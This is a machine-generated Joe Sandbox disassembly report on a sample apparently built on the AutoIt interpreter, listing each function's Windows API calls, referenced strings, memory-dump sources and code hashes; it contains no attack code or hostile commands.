                                              • Opcode Fuzzy Hash: 44092b76e2756ad7faee56fdf335d07ed7bf3eca9c1c678fff9ea388d694ee98
                                              • Instruction Fuzzy Hash: 3131E5B1E4831D6ADF119FB68C8999FBFE8FF04754F50452AE50DE7280DA78A5008F91
                                              APIs
                                              • _memset.LIBCMT ref: 003CA259
                                              • DestroyWindow.USER32(?,?), ref: 003CA2D3
                                                • Part of subcall function 00347BCC: _memmove.LIBCMT ref: 00347C06
                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 003CA34D
                                              • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 003CA36F
                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 003CA382
                                              • DestroyWindow.USER32(00000000), ref: 003CA3A4
                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00340000,00000000), ref: 003CA3DB
                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 003CA3F4
                                              • GetDesktopWindow.USER32 ref: 003CA40D
                                              • GetWindowRect.USER32(00000000), ref: 003CA414
                                              • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 003CA42C
                                              • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 003CA444
                                                • Part of subcall function 003425DB: GetWindowLongW.USER32(?,000000EB), ref: 003425EC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                              • String ID: 0$tooltips_class32
                                              • API String ID: 1297703922-3619404913
                                              • Opcode ID: 4e999e06d5de6f711affb55374230faf22710f20e9771201c0c05e0cf4933495
                                              • Instruction ID: 183132c8d9a2896082bb3c631a674adf18de68d922a99f7545d9d89c4496c256
                                              • Opcode Fuzzy Hash: 4e999e06d5de6f711affb55374230faf22710f20e9771201c0c05e0cf4933495
                                              • Instruction Fuzzy Hash: 14717971140608AFDB26DF28CC49F6A7BEAFB88304F05452DF985DB2A0C770A916CB56
                                              APIs
                                              • CharUpperBuffW.USER32(?,?), ref: 003C4424
                                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 003C446F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: BuffCharMessageSendUpper
                                              • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                              • API String ID: 3974292440-4258414348
                                              • Opcode ID: ff135646ea64d742b0de6bb2c30e9d0f4ee2b654aea090bed5d6064214882b65
                                              • Instruction ID: cfd4dd0522a18af5a5a3148432155313e98cc461b321a095b079440829a9f678
                                              • Opcode Fuzzy Hash: ff135646ea64d742b0de6bb2c30e9d0f4ee2b654aea090bed5d6064214882b65
                                              • Instruction Fuzzy Hash: 9C916A346043019BCB1AEF14C462B6EB7E5AF95350F05886DF8969F7A2CB31ED09CB81
                                              APIs
                                              • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 003CB8B4
                                              • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,003C91C2), ref: 003CB910
                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 003CB949
                                              • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 003CB98C
                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 003CB9C3
                                              • FreeLibrary.KERNEL32(?), ref: 003CB9CF
                                              • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 003CB9DF
                                              • DestroyIcon.USER32(?,?,?,?,?,003C91C2), ref: 003CB9EE
                                              • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 003CBA0B
                                              • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 003CBA17
                                                • Part of subcall function 00362EFD: __wcsicmp_l.LIBCMT ref: 00362F86
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                              • String ID: .dll$.exe$.icl
                                              • API String ID: 1212759294-1154884017
                                              • Opcode ID: dffa24c4be865476f5c8d847b1198d224fa9b0ccf8fd291a79a1e9b15e19b1d4
                                              • Instruction ID: c3c0064c6fe6fbc1c652d918c54cf99c157e67cb56553d6fccab72a675704863
                                              • Opcode Fuzzy Hash: dffa24c4be865476f5c8d847b1198d224fa9b0ccf8fd291a79a1e9b15e19b1d4
                                              • Instruction Fuzzy Hash: C861D171900619BEEB16DF64CC42FBEBBACEB08710F10851AF915DA1D0DB75AD90DBA0
                                              APIs
                                              • GetLocalTime.KERNEL32(?), ref: 003ADCDC
                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 003ADCEC
                                              • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 003ADCF8
                                              • __wsplitpath.LIBCMT ref: 003ADD56
                                              • _wcscat.LIBCMT ref: 003ADD6E
                                              • _wcscat.LIBCMT ref: 003ADD80
                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 003ADD95
                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 003ADDA9
                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 003ADDDB
                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 003ADDFC
                                              • _wcscpy.LIBCMT ref: 003ADE08
                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 003ADE47
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                              • String ID: *.*
                                              • API String ID: 3566783562-438819550
                                              • Opcode ID: 4cc0fb581aacdbaa737fc4aacfe1b00d1e45b7322d6801b5365ec20a52b9151f
                                              • Instruction ID: 3fe3d4ea73ed8142a04f012710914f426d3c004e5303dbee1870d6d86999ffaa
                                              • Opcode Fuzzy Hash: 4cc0fb581aacdbaa737fc4aacfe1b00d1e45b7322d6801b5365ec20a52b9151f
                                              • Instruction Fuzzy Hash: 43615B765042059FCB11EF64C844EAFB3E8FF8A310F04491AE99ACB651EB71E945CB91
                                              APIs
                                              • LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 003A9C7F
                                                • Part of subcall function 00347DE1: _memmove.LIBCMT ref: 00347E22
                                              • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 003A9CA0
                                              • __swprintf.LIBCMT ref: 003A9CF9
                                              • __swprintf.LIBCMT ref: 003A9D12
                                              • _wprintf.LIBCMT ref: 003A9DB9
                                              • _wprintf.LIBCMT ref: 003A9DD7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: LoadString__swprintf_wprintf$_memmove
                                              • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                              • API String ID: 311963372-3080491070
                                              • Opcode ID: aa24c326e5db4f1c97c8657c990cca9ceeaccf320d4ff0e69df596c2a6c1e667
                                              • Instruction ID: d06bfc425346c61ffa784ce47626ef51327dba480ff63e1e0d3ef21a20c5d2d0
                                              • Opcode Fuzzy Hash: aa24c326e5db4f1c97c8657c990cca9ceeaccf320d4ff0e69df596c2a6c1e667
                                              • Instruction Fuzzy Hash: F3516F32900509AACF16EBE0DD86EEEB7B8EF14300F500066F505BA1A2DB312E59DF60
                                              APIs
                                                • Part of subcall function 00349837: __itow.LIBCMT ref: 00349862
                                                • Part of subcall function 00349837: __swprintf.LIBCMT ref: 003498AC
                                              • CharLowerBuffW.USER32(?,?), ref: 003AA3CB
                                              • GetDriveTypeW.KERNEL32 ref: 003AA418
                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 003AA460
                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 003AA497
                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 003AA4C5
                                                • Part of subcall function 00347BCC: _memmove.LIBCMT ref: 00347C06
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                              • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                              • API String ID: 2698844021-4113822522
                                              • Opcode ID: e12dec79803c084425436099f91c8b1ea324f22b5aabebed772ccc30e8ce9c13
                                              • Instruction ID: 5aa47db62b82950c659fd395d2a142e193fd78b1ec176f3cffce7cb69bf0a28c
                                              • Opcode Fuzzy Hash: e12dec79803c084425436099f91c8b1ea324f22b5aabebed772ccc30e8ce9c13
                                              • Instruction Fuzzy Hash: 43517E725047059FC706EF25C88196BB3E8FF89758F00886DF88A9B261DB71ED09CB42
                                              APIs
                                              • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,0037E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 0039F8DF
                                              • LoadStringW.USER32(00000000,?,0037E029,00000001), ref: 0039F8E8
                                                • Part of subcall function 00347DE1: _memmove.LIBCMT ref: 00347E22
                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,0037E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 0039F90A
                                              • LoadStringW.USER32(00000000,?,0037E029,00000001), ref: 0039F90D
                                              • __swprintf.LIBCMT ref: 0039F95D
                                              • __swprintf.LIBCMT ref: 0039F96E
                                              • _wprintf.LIBCMT ref: 0039FA17
                                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0039FA2E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                              • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                              • API String ID: 984253442-2268648507
                                              • Opcode ID: 9fd7f431e8feedaca91b7663eead8c19e4169352323a145673c2d4930300b859
                                              • Instruction ID: df5d78ffaae86d917c1d9f96064fb28c13f1e18e3e7b7d7a57eeedd94d1e7d9c
                                              • Opcode Fuzzy Hash: 9fd7f431e8feedaca91b7663eead8c19e4169352323a145673c2d4930300b859
                                              • Instruction Fuzzy Hash: 5F410D72904109AACF16FBE4DD86EEEB7B8AF14300F500465F505BA0A2EB356F49CB61
                                              APIs
                                              • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,003C9207,?,?), ref: 003CBA56
                                              • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,003C9207,?,?,00000000,?), ref: 003CBA6D
                                              • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,003C9207,?,?,00000000,?), ref: 003CBA78
                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,003C9207,?,?,00000000,?), ref: 003CBA85
                                              • GlobalLock.KERNEL32(00000000), ref: 003CBA8E
                                              • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,003C9207,?,?,00000000,?), ref: 003CBA9D
                                              • GlobalUnlock.KERNEL32(00000000), ref: 003CBAA6
                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,003C9207,?,?,00000000,?), ref: 003CBAAD
                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,003C9207,?,?,00000000,?), ref: 003CBABE
                                              • OleLoadPicture.OLEAUT32(?,00000000,00000000,003D2CAC,?), ref: 003CBAD7
                                              • GlobalFree.KERNEL32(00000000), ref: 003CBAE7
                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 003CBB0B
                                              • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 003CBB36
                                              • DeleteObject.GDI32(00000000), ref: 003CBB5E
                                              • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 003CBB74
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                              • String ID:
                                              • API String ID: 3840717409-0
                                              • Opcode ID: 78f3dae36036702a7d6605aa74f8695ad0b6ed2e66f80fa9f9b0a0a48d813a49
                                              • Instruction ID: f17f1f23f5016b651718aa676f461824e69454b8fafde4d7b65d1377944e0f9c
                                              • Opcode Fuzzy Hash: 78f3dae36036702a7d6605aa74f8695ad0b6ed2e66f80fa9f9b0a0a48d813a49
                                              • Instruction Fuzzy Hash: DE410579600208AFDB129F65DC89EABBBBDFB89711F114069F945D7260D730AE01DB60
                                              APIs
                                              • __wsplitpath.LIBCMT ref: 003ADA10
                                              • _wcscat.LIBCMT ref: 003ADA28
                                              • _wcscat.LIBCMT ref: 003ADA3A
                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 003ADA4F
                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 003ADA63
                                              • GetFileAttributesW.KERNEL32(?), ref: 003ADA7B
                                              • SetFileAttributesW.KERNEL32(?,00000000), ref: 003ADA95
                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 003ADAA7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                              • String ID: *.*
                                              • API String ID: 34673085-438819550
                                              • Opcode ID: a3dee539afa816c6f8e5ee59dd9a5bab61587d1ad305d082f3481aee25e31950
                                              • Instruction ID: a147f1384ad4c9e0bda992e79599c35190caae1f2717e6e647e7d0ca4cde7864
                                              • Opcode Fuzzy Hash: a3dee539afa816c6f8e5ee59dd9a5bab61587d1ad305d082f3481aee25e31950
                                              • Instruction Fuzzy Hash: CA8181715043419FCB66DF64C844AAFB7E8EF8A710F15882EF88ACB651E730E945CB52
                                              APIs
                                                • Part of subcall function 00342612: GetWindowLongW.USER32(?,000000EB), ref: 00342623
                                              • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 003CC1FC
                                              • GetFocus.USER32 ref: 003CC20C
                                              • GetDlgCtrlID.USER32(00000000), ref: 003CC217
                                              • _memset.LIBCMT ref: 003CC342
                                              • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 003CC36D
                                              • GetMenuItemCount.USER32(?), ref: 003CC38D
                                              • GetMenuItemID.USER32(?,00000000), ref: 003CC3A0
                                              • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 003CC3D4
                                              • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 003CC41C
                                              • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 003CC454
                                              • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 003CC489
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                              • String ID: 0
                                              • API String ID: 1296962147-4108050209
                                              • Opcode ID: e12a653cd5278948153ee3d6ed9676e212381d3ef9fdb0001a30998ddfd03f0d
                                              • Instruction ID: 9f60d047ff7c8a1f2cbd4361442619ca38d2c1c3063172e8a893ed9d31e8d84b
                                              • Opcode Fuzzy Hash: e12a653cd5278948153ee3d6ed9676e212381d3ef9fdb0001a30998ddfd03f0d
                                              • Instruction Fuzzy Hash: 7E8177712183019FDB16DF15D894E6BBBE9EB88314F00892EF999D7291C730ED05CB52
                                              APIs
                                              • GetDC.USER32(00000000), ref: 003B738F
                                              • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 003B739B
                                              • CreateCompatibleDC.GDI32(?), ref: 003B73A7
                                              • SelectObject.GDI32(00000000,?), ref: 003B73B4
                                              • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 003B7408
                                              • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 003B7444
                                              • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 003B7468
                                              • SelectObject.GDI32(00000006,?), ref: 003B7470
                                              • DeleteObject.GDI32(?), ref: 003B7479
                                              • DeleteDC.GDI32(00000006), ref: 003B7480
                                              • ReleaseDC.USER32(00000000,?), ref: 003B748B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                              • String ID: (
                                              • API String ID: 2598888154-3887548279
                                              • Opcode ID: ed707fbdf1c521996c6b154485b1c223e99ecb933ad381d5bda68ef65a4858fb
                                              • Instruction ID: ea61deead637a89b3266803787d9e08cba0bc8a4f49f147af36d3c8bdc7ae06f
                                              • Opcode Fuzzy Hash: ed707fbdf1c521996c6b154485b1c223e99ecb933ad381d5bda68ef65a4858fb
                                              • Instruction Fuzzy Hash: 69514C75904309EFCB16CFA9CC85EAEBBB9EF88710F148429FA5997610C731A9408B90
                                              APIs
                                                • Part of subcall function 00360957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00346B0C,?,00008000), ref: 00360973
                                                • Part of subcall function 00344750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00344743,?,?,003437AE,?), ref: 00344770
                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00346BAD
                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00346CFA
                                                • Part of subcall function 0034586D: _wcscpy.LIBCMT ref: 003458A5
                                                • Part of subcall function 0036363D: _iswctype.LIBCMT ref: 00363645
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                              • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                              • API String ID: 537147316-1018226102
                                              • Opcode ID: 8d6eb1c66658066cb39b6b8ff8534abe16e4a2f01fcb4d75c85f13e4804e8a09
                                              • Instruction ID: 60b0c3633761e779dcabc906f9e037a826e1f75196ee75168d2bfb7d448c6bdf
                                              • Opcode Fuzzy Hash: 8d6eb1c66658066cb39b6b8ff8534abe16e4a2f01fcb4d75c85f13e4804e8a09
                                              • Instruction Fuzzy Hash: B802A1315083409FC726EF24C891AAFBBE5EF99314F10491DF4999B2A2DB34E949CB53
                                              APIs
                                              • _memset.LIBCMT ref: 003A2D50
                                              • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 003A2DDD
                                              • GetMenuItemCount.USER32(00405890), ref: 003A2E66
                                              • DeleteMenu.USER32(00405890,00000005,00000000,000000F5,?,?), ref: 003A2EF6
                                              • DeleteMenu.USER32(00405890,00000004,00000000), ref: 003A2EFE
                                              • DeleteMenu.USER32(00405890,00000006,00000000), ref: 003A2F06
                                              • DeleteMenu.USER32(00405890,00000003,00000000), ref: 003A2F0E
                                              • GetMenuItemCount.USER32(00405890), ref: 003A2F16
                                              • SetMenuItemInfoW.USER32(00405890,00000004,00000000,00000030), ref: 003A2F4C
                                              • GetCursorPos.USER32(?), ref: 003A2F56
                                              • SetForegroundWindow.USER32(00000000), ref: 003A2F5F
                                              • TrackPopupMenuEx.USER32(00405890,00000000,?,00000000,00000000,00000000), ref: 003A2F72
                                              • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 003A2F7E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                              • String ID:
                                              • API String ID: 3993528054-0
